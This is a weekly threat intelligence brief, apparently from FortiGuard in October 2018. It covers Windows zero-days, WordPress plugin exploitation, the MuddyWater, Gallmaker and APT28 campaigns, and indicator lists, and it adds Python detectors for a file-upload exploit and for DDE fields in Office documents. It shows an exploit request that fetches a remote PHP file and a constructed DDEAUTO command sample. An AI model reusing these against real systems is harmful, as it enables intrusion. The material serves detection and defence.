Activity Summary - Week Ending October 12, 2018
A zero-day bug being actively exploited in the wild was patched by Microsoft this week. CVE-2018-8453 addresses an elevation of privilege flaw in the Win32k component (the kernel-mode driver win32k.sys) that allows an attacker to run code with kernel-mode privileges. An attacker who successfully exploits it could install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would first have to log on to the system and then run a specially crafted application that exploits the flaw to take control of the affected system. The update addresses the vulnerability by correcting how Win32k handles objects in memory. Exploitation is attributed to the APT group FruityArmor, a Middle East-based actor with a history of using Windows zero-days; the group is known for targeted attacks that chain elevation of privilege 0-days to escape browser sandboxes and execute its malicious code. Fortinet's IPS signature is: MS.Windows.CVE-2018-8453.Privilege.Escalation

Another zero-day bug was patched this month and also deserves immediate attention. CVE-2018-8423 addresses a Microsoft JET Database Engine 0-day that was publicly (and irresponsibly) disclosed in September, along with sample exploit code, before a patch was available. If exploited, this remote code execution vulnerability could give the attacker full control of the system. To exploit it, a user must open or import a specially crafted JET Database Engine file; in an email attack scenario, the attacker sends the crafted file to the user and convinces them to open it. The security update addresses the vulnerability by modifying how the JET Database Engine handles objects in memory. Fortinet's IPS signature is: MS.JET.DB.Engine.Page.Parsing.Out.of.Bound.Memorry.Corruption
Application Vulnerabilities / IPS
Rank | Name | Prevalence
1 | MS.IIS.WebDAV.PROPFIND.ScStoragePathFromUrl.Buffer.Overflow | 41,495
2 | D-Link.DSL-2750B.CLI.OS.Command.Injection | 20,031
3 | Avtech.Devices.HTTP.Request.Parsing.Multiple.Vulnerabilities | 18,604
4 | Dasan.GPON.Remote.Code.Execution | 18,218
5 | Dahua.IP.Camera.Unauthorized.File.Access.Information.Disclosure | 17,602
WordPress.WP.Mobile.Detector.Arbitrary.File.Upload – The WP Mobile Detector plugin automatically detects standard and advanced mobile devices and serves a compatible WordPress mobile theme to users on such devices. Both resize.php and timthumb.php in versions <= 3.5 of this plugin are vulnerable to arbitrary file upload. For example, an attacker can send a simple HTTP POST request, "POST /wp-content/plugins/wp-mobile-detector/resize.php" with the body "src=hxxp://site[.]domain/mig/tmp/css.php", to have the plugin fetch and store a remote file on the web server. This is possible only because the vulnerable function does not validate or sanitize input from untrusted sources. The plugin is no longer supported; its final version is 3.9. We are seeing increased exploitation activity, with close to 3% of sensors worldwide picking up traffic attempting to exploit this issue.
Signatures: WordPress.WP.Mobile.Detector.Arbitrary.File.Upload

XAttacker.Tool.WebApp.Plugins.Arbitrary.File.Upload – This signature identifies exploit traffic generated by the XAttacker tool when it attempts to exploit arbitrary file upload vulnerabilities. XAttacker was released recently and bundles exploits for web-based content management systems (CMS) such as Drupal, Joomla, and WordPress; it is becoming increasingly popular because of its relative ease of use and extensive list of supported targets. As with all file upload vulnerabilities, the attacker first submits the file as a request argument and later issues an HTTP request to the uploaded path to get it executed; our IPS signature detects this anomalous sequence. Based on our telemetry, this signature is in the top 100 exploitation attempts, with close to 2% of sensors worldwide picking up traffic matching the detection.
Signatures: XAttacker.Tool.WebApp.Plugins.Arbitrary.File.Upload
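To make the WP Mobile Detector pattern concrete, here is an added example (not Fortinet's signature logic and not the plugin's code) that flags requests to the two vulnerable scripts whose src parameter points at a remote origin, which is what turns the image resizer into an upload primitive. The request records below are constructed for the example; the plugin path and script names are taken from the text above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Vulnerable endpoints named in the advisory text (plugin versions <= 3.5).
PLUGIN_DIR = "/wp-content/plugins/wp-mobile-detector/"
VULN_SCRIPTS = ("resize.php", "timthumb.php")

# A src that names a remote origin ("http://", "https://" or scheme-relative "//")
# makes the plugin fetch and store attacker-controlled content.
REMOTE_SRC = re.compile(r"^(?:https?:)?//", re.IGNORECASE)


def _params(uri, body):
    """Merge query-string and form-body parameters (last value wins)."""
    merged = {}
    for raw in (urlsplit(uri).query, body or ""):
        for key, vals in parse_qs(raw, keep_blank_values=True).items():
            merged[key] = vals[-1]
    return merged


def detect_wp_mobile_detector(method, uri, body=None):
    """Return a short verdict if the request matches the exploit pattern, else None.

    Relative src values are what the plugin legitimately expects, so only a
    remote src aimed at resize.php/timthumb.php under the plugin directory alerts.
    """
    path = urlsplit(uri).path.lower()
    if not path.startswith(PLUGIN_DIR) or not path.endswith(VULN_SCRIPTS):
        return None
    src = _params(uri, body).get("src", "")
    if src and REMOTE_SRC.match(src):
        script = path.rsplit("/", 1)[-1]
        return f"remote src fetch via {script} ({method})"
    return None


# Constructed request records as a reverse proxy or WAF might log them:
# (method, request URI, request body or None). Hostnames are placeholders.
CONSTRUCTED_REQUESTS = [
    ("POST", "/wp-content/plugins/wp-mobile-detector/resize.php",
     "src=http://site.example/mig/tmp/css.php"),                      # exploit, as in the text
    ("GET", "/wp-content/plugins/wp-mobile-detector/timthumb.php?src=http://site.example/x.php",
     None),                                                             # same flaw, other script
    ("GET", "/wp-content/plugins/wp-mobile-detector/resize.php?src=wp-content/uploads/2018/10/logo.png",
     None),                                                             # legitimate local resize
    ("GET", "/wp-content/plugins/wp-mobile-detector/resize.php", None),  # no src at all
    ("GET", "/index.php", None),                                        # unrelated
]


def scan(requests=CONSTRUCTED_REQUESTS):
    """Return (method, uri, verdict) for every record that trips the detector."""
    hits = []
    for method, uri, body in requests:
        verdict = detect_wp_mobile_detector(method, uri, body)
        if verdict:
            hits.append((method, uri, verdict))
    return hits


if __name__ == "__main__":
    for hit in scan():
        print(*hit, sep="  ")
```

Only the first two constructed records alert; the local-path resize and the src-less request are the plugin's normal traffic and stay quiet, which is the distinction a signature for this flaw has to make to avoid flooding a sensor with false positives.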
Malware Activity
Rank | Name | Prevalence
1 | Android/Agent.FJ!tr | 8,965
2 | W32/Agent.AJFK!tr | 3,281
3 | Adware/Agent | 2,359
4 | Riskware/CoinHive | 1,963
5 | W32/GenKryptik.CNGX!tr | 1,741
Muddy Waters is Back! – FortiGuard Labs is aware of renewed activity by MuddyWater, an APT campaign first documented by researchers in 2017. The group has been most active in the Middle East but has also been seen attacking targets in Europe and the United States. Its modus operandi is spear-phishing against educational, military, telecom, and governmental institutions in the Middle East. Victims receive a carefully crafted document tailored to the targeted region: the lure is specific to the local language and entities and is styled to look as if it originates from an existing official governmental body. The document carries a malicious macro that displays a fake text box. The macro drops three files into the ProgramData folder and adds a value to the current user's Run key (HKCU) for persistence. The dropped files come either as an INF, SCT, and TXT set or as a VBS and TXT set. Once decoded on the victim machine, they spawn a PowerShell process that consumes the Base64-encoded file. PowerShell then turns off Office macro warnings, which lets it access internal VBA objects for further penetration. Once the connection to the C2 is made, the implant can take screenshots, receive additional PowerShell instructions that have Excel perform a second stage via DDE, and receive further PowerShell instructions to execute via Explorer and COM. It can also download files from the C2 server, wipe the C, D, E, and F drives, and shut down or restart the system.
Signatures: VBA/Agent.AFFE!tr, VBA/Dloader.GRI!tr, VBA/Agent.UFWF!tr, W32/Python_Stealer.C!tr.pws, VBA/Agent.6B7D!tr.dldr, Riskware/Credstealer, VBA/Agent.GFQ!tr, VBA/TrojanDropper.AAF!tr, VBA/TrojanDropper.ZG!tr, Riskware/Shootback, VBA/Agent.BAC4!tr, VBA/Agent.YU!tr, VBA/Agent.GRG!tr
Indicator(s):
alibabacloud[.]dynamic-dns[.]net
alibabacloud[.]wikaba[.]com
alibabacloud[.]zzux[.]com
microsoftofice[.]zyns[.]com
microword[.]itemdb[.]com
moffice[.]mrface[.]com
muonline[.]dns04[.]com
office[.]otzo[.]com
offlce[.]dnset[.]com
online[.]ezua[.]com
muhacirder[.]com
muteciyar[.]info

Not Gallbladder or Gallstone, but Gallmaker! – In conjunction with the Cyber Threat Alliance (CTA), Symantec has published a blog on a newly identified nation-state actor it calls Gallmaker. Gallmaker primarily targets the Eastern Europe and Middle East (EMEA) regions, specifically embassies in Eastern Europe and military and defense organizations in the Middle East. Because of our membership in the CTA, we had coverage and protections in place before the announcement was made. The observed distribution method is spear-phishing with a carefully crafted, weaponized Microsoft Office document that uses Dynamic Data Exchange (DDE) to infect the victim with malware. Microsoft has long held that DDE is a feature of Office, not a vulnerability; nevertheless, because DDE was enabled by default and its abuse was widely observed in the field, Microsoft released an update late in 2017 that disables DDE by default. That update has been available for almost a year, but attackers know that many organizations are slow to apply updates, and this campaign succeeded for exactly that reason.

Symantec's observations are straightforward. Once the victim opens the Office document, DDE executes PowerShell, which runs obfuscated shellcode to download a reverse shell. Symantec also identified the use of a legitimate copy of WinZip, which may be used to package data for exfiltration to the attacker, and of the Rex PowerShell library from GitHub, which creates and manipulates PowerShell scripts for use with Metasploit.
Signatures: WM/Agent.15E8!tr.dldr, MSOffice/DdeExec.K!tr.dldr, Data/Gallmaker.A!tr, W32/Snojan.BMWL!tr, VBA/Agent!tr, WM/Agent.4916!tr, WM/Agent.HE!tr
Indicator(s):
5[.]223[.]98[.]157
45[.]55[.]154[.]23
87[.]17[.]148[.]117
87[.]17[.]148[.]76
93[.]109[.]241[.]154
82[.]202[.]120[.]156
111[.]90[.]149[.]99
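Both the MuddyWater second stage and the Gallmaker lure rely on DDE fields inside Office documents. As an added example (not Symantec's or Fortinet's tooling, and not part of the original brief), the following static scanner opens a .docx package in memory and reports any field whose instruction is DDE or DDEAUTO. It joins the instruction text across runs inside a paragraph, because weaponized documents commonly split "DDEAUTO" over several w:instrText elements to defeat naive string matching. The two sample documents are constructed inline with only the parts the scanner reads; the command line inside the malicious sample is a placeholder, not a real payload.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# WordprocessingML namespace, in ElementTree's {uri}local form.
W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"

# Field instructions start with the field type; DDE and DDEAUTO are the two that
# launch an external application (Word disables them by default since late 2017).
DDE_FIELD = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def field_instructions(part_xml):
    """Yield every field instruction string found in one WordprocessingML part.

    Complex fields spread the instruction over several <w:instrText> runs, so the
    runs are joined per paragraph; simple fields carry it in a w:instr attribute.
    """
    root = ET.fromstring(part_xml)
    for para in root.iter(W + "p"):
        pieces = [t.text or "" for t in para.iter(W + "instrText")]
        if pieces:
            yield "".join(pieces)
    for fld in root.iter(W + "fldSimple"):
        yield fld.get(W + "instr", "")


def find_dde_fields(docx_bytes):
    """Return (part_name, normalised_instruction) for every DDE/DDEAUTO field."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as package:
        for name in package.namelist():
            # document.xml plus headers, footers, footnotes etc. all live under word/
            if name.startswith("word/") and name.endswith(".xml"):
                for instr in field_instructions(package.read(name)):
                    if DDE_FIELD.search(instr):
                        hits.append((name, " ".join(instr.split())))
    return hits


def build_docx(body_xml):
    """Build a minimal, constructed .docx in memory (not a full OOXML package)."""
    doc = f'<w:document xmlns:w="{W[1:-1]}"><w:body>{body_xml}</w:body></w:document>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as package:
        package.writestr("[Content_Types].xml", "<Types/>")
        package.writestr("word/document.xml", doc)
    return buf.getvalue()


# Constructed malicious sample: the DDEAUTO keyword split across two runs,
# launching cmd.exe with a placeholder PowerShell argument.
MALICIOUS = build_docx(
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">AUTO c:\\Windows\\System32\\cmd.exe '
    '"/k powershell -enc AAAA"</w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
)

# Constructed benign sample: an ordinary page-number field and a hyperlink field.
BENIGN = build_docx(
    '<w:p><w:fldSimple w:instr=" PAGE \\* MERGEFORMAT "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>'
    '<w:p><w:r><w:instrText xml:space="preserve"> HYPERLINK "https://example.test" </w:instrText></w:r></w:p>'
)


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, find_dde_fields(sample))
```

The scanner is deliberately narrow: it inspects field instructions, not arbitrary text, so a document that merely mentions "DDE" in its body does not alert, while a split or case-mangled DDEAUTO instruction does. It does not follow the field to see what application it launches; treat any hit as a document to open only in an isolated environment.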
Web Filtering Activity
Indicators of Compromise for Malware Used by APT28 – The FortiGuard Labs Web Filtering team has recently been tracking APT28, which uses a number of tools against its targets. The group has begun using a Unified Extensible Firmware Interface (UEFI) rootkit known as LoJax, a trojanized version of the legitimate Computrace/LoJack anti-theft agent, which is where the campaign gets its name. Because it lives in the system firmware rather than on disk, the rootkit lets attackers execute malicious code on the target and maintain a persistent presence on a compromised machine even if the hard drive is replaced or the operating system is reinstalled. The X-Agent tool, also known as Chopstick, runs on Windows, iOS, and Unix-based operating systems and includes keylogging and file extraction. X-Tunnel is a network tunneling tool used for network traversal and pivoting: it provides a secure tunnel to an external C2 server through which the threat actor can run various networking tools and protocols back to attacker infrastructure, and it is commonly deployed alongside X-Agent. Zebrocy, observed since 2015, arrives via spear-phishing emails; its payload runs systeminfo and tasklist and also takes a screenshot. The FortiGuard Labs Web Filtering team has reviewed and blacklisted all associated IOCs.
Indicator(s):
bbcweather[.]org
beststreammusic[.]com
brownvelocity[.]org
coindmarket[.]com
creekcounty[.]net
daysheduler[.]org
185[.]181[.]102[.]201
179[.]43[.]158[.]20
85[.]204[.]124[.]77
185[.]183[.]107[.]40
Source: https://fortiguard.com/resources/threat-brief/2018/10/12/fortiguard-threat-intelligence-brief-october-12-2018